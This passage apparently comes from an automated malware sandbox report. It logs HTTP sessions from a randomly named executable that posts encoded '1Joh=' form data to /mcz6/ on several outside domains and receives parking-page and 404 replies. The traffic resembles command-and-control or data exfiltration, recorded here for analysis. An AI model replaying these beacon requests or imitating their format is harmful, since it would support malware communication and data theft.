                                                    Data Raw: 31 4a 6f 68 3d 43 44 53 5a 69 62 37 68 6f 6a 76 56 38 7a 63 69 79 2b 62 7a 55 68 71 57 56 6f 6f 5a 49 46 76 4e 73 62 4e 55 64 78 38 77 67 34 71 6c 41 59 5a 73 47 47 75 51 41 5a 5a 39 57 55 5a 70 45 41 57 67 69 44 53 73 49 41 6b 69 42 4f 42 37 54 53 33 49 79 56 49 67 54 72 30 6d 4a 62 72 72 4f 4f 75 48 73 6e 77 4e 6f 62 70 47 46 2b 44 78 78 44 70 5a 73 54 66 6e 54 69 68 73 4d 68 4b 43 4a 69 6e 42 32 2b 4e 4c 68 74 6a 64 59 38 2b 53 61 53 77 35 77 4b 41 77 6c 63 76 70 4e 51 4f 35 30 58 65 36 57 43 34 61 36 76 6f 39 47 68 6c 51 59 30 61 47 79 32 48 4e 51 57 56 54 33 53 4d 57 63 34 56 74 42 77 58 65 61 33 54 76 6b 6e 39 32 30 75 32 30 2f 74 69 72 68 4a 6b 37 7a 6b 4a 79 53 61 7a 54 53 68 55 4e 53 31 41 4d 4f 42 68 7a 2f 53 68 6a 32 50 44 6f 6a 30 44 7a 6e 79 6c 35 6c 4d 67 53 64 73 36 68 6d 65 38 6f 72 61 58 41 7a 51 79 52 32 46 7a 62 67 49 46 34 54 34 30 78 73 75 30 53 36 33 75 65 76 50 79 6a 45 46 56 71 48 6e 73 4d 56 39 41 61 43 75 74 52 52 52 79 79 70 66 4f 42 56 36 41 4d 4f 46 57 79 59 51 66 32 67 [TRUNCATED]
                                                    Data Ascii: 1Joh=CDSZib7hojvV8zciy+bzUhqWVooZIFvNsbNUdx8wg4qlAYZsGGuQAZZ9WUZpEAWgiDSsIAkiBOB7TS3IyVIgTr0mJbrrOOuHsnwNobpGF+DxxDpZsTfnTihsMhKCJinB2+NLhtjdY8+SaSw5wKAwlcvpNQO50Xe6WC4a6vo9GhlQY0aGy2HNQWVT3SMWc4VtBwXea3Tvkn920u20/tirhJk7zkJySazTShUNS1AMOBhz/Shj2PDoj0Dznyl5lMgSds6hme8oraXAzQyR2FzbgIF4T40xsu0S63uevPyjEFVqHnsMV9AaCutRRRyypfOBV6AMOFWyYQf2gRkjk/xwfxYcK6bZjTMycndELvu/TNqzHReZtDFi9uF/XJtNRPPrOg0N5IlLSTOIhxAcB1JLMPv/J6DK41PfHtmg/DeLvZa/IWNvrRonwwI12suNqHafwZMS9wNaDTwTY/Z7KNHW4BqDEclhphxfZb4xfhGQKaT13EMAXinBBhORUqNy+4Cgox16pOGAaMooxyaAw2b/kKFaKy4J/aizrxBlY9+p10ZQbuiMpErpc+bdJ+Um97JEnS0TQ2dtBBisFnClugQZbXcug0y2+1xvnUhiOuVLPKfRVchLgOnLPZh5rTJcBMt0892MANK+RM/PFbydkVT39//GrwMo7hPSMjRSjoQSx2ru091GTz8gpHNbCh17AN6CyAhTcyAMOmJbQSmZRSZ8W3ibo30COuW/NswPFgFK9EBxIDKGy08K5931ET2rnHloWjnQi6pVilSPQ9PhL0ULWhYLJgC9O/pFGLqKcQCCrNC4sAEW9kqtI1jq3iIArZEy04BOp5Cuda5pz2c3QAWepQFPiLNu0GkecgXwrl22QWzuycM9Z9QddMq1JuiQFaanZ+MpFt1xYX+qF59QDzA8sReBrjwhqa9//7K49QZ38i+omTuSBPWR2pEeXZk0zLFv8f6KzyDDdT3GQ+zQfFWmxfm211c0JCsKl08nIwxO8TxPK9D [TRUNCATED]
                                                    May 16, 2024 17:21:26.427087069 CEST161INHTTP/1.1 404 Not Found
                                                    Content-Length: 18
                                                    Content-Type: text/plain
                                                    Date: Thu, 16 May 2024 15:21:26 GMT
                                                    Server: Caddy
                                                    Connection: close
                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                    Data Ascii: 404 page not found


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.949746104.37.39.71801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:21:27.714375973 CEST479OUTGET /mcz6/?1Joh=PB65ht3xmDnV1ShZ+uHkcVi2Uq9TdnP+w4dQHmlxp9S6BIZIF1eyIZ9SallNAheKgV6/CipsbblBAwuU+20rV9UCB7jgFNORqHszkZ5HGMai3UIp4A==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                                                    Host: www.gledingakademiet.no
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:21:28.717398882 CEST252INHTTP/1.1 200 OK
                                                    Content-Length: 101
                                                    Content-Type: text/html; charset=utf-8
                                                    Date: Thu, 16 May 2024 15:21:28 GMT
                                                    Server: Caddy
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 68 31 3e 50 61 72 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                    Data Ascii: <html><head> <title>Parked</title></head><body> <h1>Parked</h1></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.949747199.59.243.225801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:21:43.322536945 CEST735OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.zwervertjes.be
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.zwervertjes.be
                                                    Referer: http://www.zwervertjes.be/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 6e 6c 66 54 6e 6f 4c 50 74 39 71 46 78 6e 2b 59 4d 75 75 70 36 59 77 39 4c 32 5a 34 46 50 70 44 61 51 4c 6b 47 45 6b 6b 39 62 6c 46 4f 57 74 47 49 65 2f 38 50 35 6a 42 6d 70 54 4b 51 4d 4f 6b 5a 51 37 6d 42 43 7a 36 6a 31 42 35 66 52 4c 6b 6f 59 44 62 64 6a 4b 47 77 58 42 6f 47 77 70 44 4e 75 78 36 77 58 71 72 6a 33 46 77 76 48 31 39 68 49 4c 2b 6e 32 36 59 70 49 6c 47 74 73 73 4b 31 66 6a 78 39 74 35 42 4a 72 72 75 50 39 33 7a 75 75 59 6c 50 39 5a 73 42 36 4a 30 30 6c 77 57 68 57 51 78 39 50 52 2f 4d 61 32 53 42 64 45 68 2f 4c 62 34 34 79 4a 61 6d 71 5a 5a
                                                    Data Ascii: 1Joh=nlfTnoLPt9qFxn+YMuup6Yw9L2Z4FPpDaQLkGEkk9blFOWtGIe/8P5jBmpTKQMOkZQ7mBCz6j1B5fRLkoYDbdjKGwXBoGwpDNux6wXqrj3FwvH19hIL+n26YpIlGtssK1fjx9t5BJrruP93zuuYlP9ZsB6J00lwWhWQx9PR/Ma2SBdEh/Lb44yJamqZZ
                                                    May 16, 2024 17:21:43.887382984 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 16 May 2024 15:21:43 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1122
                                                    x-request-id: cdbc7097-3725-4c9f-a4a0-895e60c5d02c
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==
                                                    set-cookie: parking_session=cdbc7097-3725-4c9f-a4a0-895e60c5d02c; expires=Thu, 16 May 2024 15:36:43 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 45 72 46 66 34 32 2f 37 66 70 57 52 63 4c 38 6b 56 6a 6d 74 6a 4a 44 53 56 54 56 67 74 61 38 2f 74 6b 30 6f 43 52 61 64 4f 68 63 2b 6e 44 78 39 41 73 6e 48 51 71 44 44 38 33 7a 31 45 2f 70 75 5a 68 41 50 50 4d 32 70 37 4a 61 30 30 36 59 7a 55 43 48 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    May 16, 2024 17:21:43.892095089 CEST575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiY2RiYzcwOTctMzcyNS00YzlmLWE0YTAtODk1ZTYwYzVkMDJjIiwicGFnZV90aW1lIjoxNzE1ODcyOT


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.949748199.59.243.225801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:21:45.851510048 CEST759OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.zwervertjes.be
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.zwervertjes.be
                                                    Referer: http://www.zwervertjes.be/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 6e 6c 66 54 6e 6f 4c 50 74 39 71 46 72 47 4f 59 4b 50 75 70 38 34 77 79 45 57 5a 34 65 2f 6f 49 61 51 48 6b 47 46 77 30 39 70 52 46 4f 79 70 47 4a 62 54 38 4d 35 6a 42 70 4a 53 41 55 4d 4f 74 5a 51 48 75 42 43 2f 36 6a 31 46 35 66 54 54 6b 6f 49 2f 59 50 6a 4b 2b 38 33 42 71 49 51 70 44 4e 75 78 36 77 58 4f 46 6a 7a 70 77 73 30 74 39 7a 71 69 6f 6b 32 36 62 2f 59 6c 47 70 73 73 77 31 66 6a 48 39 73 55 55 4a 74 76 75 50 2f 66 7a 76 2f 59 69 55 4e 59 6e 4d 61 49 35 69 6c 42 59 72 52 45 2f 30 38 74 5a 53 73 69 35 43 38 6b 2f 75 35 53 6a 74 6c 4a 39 68 4e 51 78 49 35 31 6c 55 35 34 41 35 6b 2f 78 70 44 56 49 72 69 41 44 43 67 3d 3d
                                                    Data Ascii: 1Joh=nlfTnoLPt9qFrGOYKPup84wyEWZ4e/oIaQHkGFw09pRFOypGJbT8M5jBpJSAUMOtZQHuBC/6j1F5fTTkoI/YPjK+83BqIQpDNux6wXOFjzpws0t9zqiok26b/YlGpssw1fjH9sUUJtvuP/fzv/YiUNYnMaI5ilBYrRE/08tZSsi5C8k/u5SjtlJ9hNQxI51lU54A5k/xpDVIriADCg==
                                                    May 16, 2024 17:21:46.529448032 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 16 May 2024 15:21:45 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1122
                                                    x-request-id: 4996aa8a-e89d-4530-80a5-78773976669e
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==
                                                    set-cookie: parking_session=4996aa8a-e89d-4530-80a5-78773976669e; expires=Thu, 16 May 2024 15:36:46 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 45 72 46 66 34 32 2f 37 66 70 57 52 63 4c 38 6b 56 6a 6d 74 6a 4a 44 53 56 54 56 67 74 61 38 2f 74 6b 30 6f 43 52 61 64 4f 68 63 2b 6e 44 78 39 41 73 6e 48 51 71 44 44 38 33 7a 31 45 2f 70 75 5a 68 41 50 50 4d 32 70 37 4a 61 30 30 36 59 7a 55 43 48 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    May 16, 2024 17:21:46.534107924 CEST575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDk5NmFhOGEtZTg5ZC00NTMwLTgwYTUtNzg3NzM5NzY2NjllIiwicGFnZV90aW1lIjoxNzE1ODcyOT


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.949749199.59.243.225801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:21:48.759565115 CEST1772OUTPOST /mcz6/ HTTP/1.1
                                                    Host: www.zwervertjes.be
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.zwervertjes.be
                                                    Referer: http://www.zwervertjes.be/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 6e 6c 66 54 6e 6f 4c 50 74 39 71 46 72 47 4f 59 4b 50 75 70 38 34 77 79 45 57 5a 34 65 2f 6f 49 61 51 48 6b 47 46 77 30 39 70 70 46 4f 48 39 47 49 34 72 38 44 5a 6a 42 6b 70 53 42 55 4d 50 39 5a 51 76 55 42 43 6a 71 6a 77 5a 35 51 51 62 6b 2f 4c 6e 59 56 7a 4b 2b 30 58 42 6e 47 77 70 7a 4e 75 68 2b 77 58 2b 46 6a 7a 70 77 73 79 70 39 6c 49 4b 6f 69 32 36 59 70 49 6c 43 74 73 74 66 31 66 36 79 39 73 67 45 4a 39 50 75 4f 66 76 7a 6f 4e 41 69 59 4e 59 6c 4e 61 4a 71 69 6c 4e 54 72 56 6b 7a 30 38 70 6a 53 72 75 35 53 74 56 68 36 61 71 67 75 32 68 5a 30 61 6b 70 42 64 6b 45 56 34 68 50 6b 46 43 51 39 51 49 74 6c 6a 56 72 55 75 55 2f 6d 6d 38 53 6e 71 48 4a 71 41 74 6f 66 54 56 30 47 4f 61 6d 42 33 64 56 41 32 49 48 64 44 71 70 79 63 42 63 6e 71 6c 6f 46 32 53 7a 67 73 2f 56 6a 2b 6e 61 4b 61 4c 6c 55 79 6d 42 79 49 34 49 6f 2f 4a 2f 59 4d 6c 34 58 33 4e 51 6e 4d 31 2f 79 6e 2b 42 6b 31 68 6d 37 79 39 54 56 4d 30 55 47 2f 51 30 63 33 78 74 6d 6c 35 4b 46 4a 71 4c 41 6d 69 6a 6e 68 75 36 6b [TRUNCATED]
                                                    Data Ascii: 1Joh=nlfTnoLPt9qFrGOYKPup84wyEWZ4e/oIaQHkGFw09ppFOH9GI4r8DZjBkpSBUMP9ZQvUBCjqjwZ5QQbk/LnYVzK+0XBnGwpzNuh+wX+Fjzpwsyp9lIKoi26YpIlCtstf1f6y9sgEJ9PuOfvzoNAiYNYlNaJqilNTrVkz08pjSru5StVh6aqgu2hZ0akpBdkEV4hPkFCQ9QItljVrUuU/mm8SnqHJqAtofTV0GOamB3dVA2IHdDqpycBcnqloF2Szgs/Vj+naKaLlUymByI4Io/J/YMl4X3NQnM1/yn+Bk1hm7y9TVM0UG/Q0c3xtml5KFJqLAmijnhu6k4vpUS0gu5TiNyrDr8eLIRmeLcz79ZvluNRylwD8+zo3tBtjEiLISa8e+4382aCpY+1kycEM8nphg6muPZRNMGeX3jIpl1bDbPyfdeljkFs/w0hmBeWCzAIRWxeBwgLPuTCFOcHb6ZPcfizdv4W2K/Yg43eUTVReUADAVO2itpdPX/vwR82/IrOA/5XcVhqCFq9ID6vDmnETBp+2fybT6MFI7kffkPrTHnNwI2SWDt8f37rdvG5bJYi7KTqbvEag0++0WkvWEk+NCy84vQmJq6eH91QxfkT07Q829datZynYiGaVrxGl26NEgaLh8wxGQnJlciGL+jqAz3Tao6QyQHiUnNvOyjRtkBW/SiB9s27kqNNDxy+6Z0YzKVZDrycJGsRXs4p4kToAjcO1Q4ASj8EQwdXVgAWR7qFhAbKHUnz5Z4rfVgiqq8WuSMJ+GzZ3kz/nkQfKGtY+0neALfyAj0B9ekWDOT97Tcbs8YwPqvrOezSzcv399Xh+LfUjpMBqkUNk329KvwnyQWVHYcq+bzcsOCsPv/z2QUpgWmU6MkFghGSUcJc7EgbPo/ItD+m0XS3wiP9k3IwEidSZW2f6z2nHXtdcOLA7X4A5y3roomeXCkcPh4MqXYr6dwqalkxVIHWUdb/JPhJ4x2XOJkXtu1EjXsFwwpg1ULv [TRUNCATED]
                                                    May 16, 2024 17:21:49.398210049 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 16 May 2024 15:21:49 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1122
                                                    x-request-id: 8b99cfdc-99e1-4d80-b1cc-40f27f81866d
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==
                                                    set-cookie: parking_session=8b99cfdc-99e1-4d80-b1cc-40f27f81866d; expires=Thu, 16 May 2024 15:36:49 GMT; path=/
                                                    connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 43 45 72 46 66 34 32 2f 37 66 70 57 52 63 4c 38 6b 56 6a 6d 74 6a 4a 44 53 56 54 56 67 74 61 38 2f 74 6b 30 6f 43 52 61 64 4f 68 63 2b 6e 44 78 39 41 73 6e 48 51 71 44 44 38 33 7a 31 45 2f 70 75 5a 68 41 50 50 4d 32 70 37 4a 61 30 30 36 59 7a 55 43 48 63 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CErFf42/7fpWRcL8kVjmtjJDSVTVgta8/tk0oCRadOhc+nDx9AsnHQqDD83z1E/puZhAPPM2p7Ja006YzUCHcA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                    May 16, 2024 17:21:49.402992010 CEST224INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGI5OWNmZGMtOTllMS00ZDgwLWIxY2MtNDBmMjdmODE4NjZkIiwicGFnZV9
                                                    May 16, 2024 17:21:49.403009892 CEST351INData Raw: 30 61 57 31 6c 49 6a 6f 78 4e 7a 45 31 4f 44 63 79 4f 54 41 35 4c 43 4a 77 59 57 64 6c 58 33 56 79 62 43 49 36 49 6d 68 30 64 48 41 36 4c 79 39 33 64 33 63 75 65 6e 64 6c 63 6e 5a 6c 63 6e 52 71 5a 58 4d 75 59 6d 55 76 62 57 4e 36 4e 69 38 69 4c
                                                    Data Ascii: 0aW1lIjoxNzE1ODcyOTA5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuendlcnZlcnRqZXMuYmUvbWN6Ni8iLCJwYWdlX21ldGhvZCI6IlBPU1QiLCJwYWdlX3JlcXVlc3QiOnt9LCJwYWdlX2hlYWRlcnMiOnsicmVmZXJlciI6WyJodHRwOi8vd3d3Lnp3ZXJ2ZXJ0amVzLmJlL21jejYvIl19LCJob3N0Ijoid3d3Lnp3ZXJ2ZX


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.949750199.59.243.225801016C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    TimestampBytes transferredDirectionData
                                                    May 16, 2024 17:21:51.276734114 CEST474OUTGET /mcz6/?1Joh=qn3zkYHztMKe8mzhAMvQ2dUsB2FJeuQFLz3cQj0k4MJfJlhRJYX+G77tvqK2UZX2Wgv5bTm3q1t3YjrK87HOZU6owkhcBiV/M9JN6GagiG0Bu0xexw==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                                                    Host: www.zwervertjes.be
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:21:52.385963917 CEST1236INHTTP/1.1 200 OK
                                                    date: Thu, 16 May 2024 15:21:51 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1466
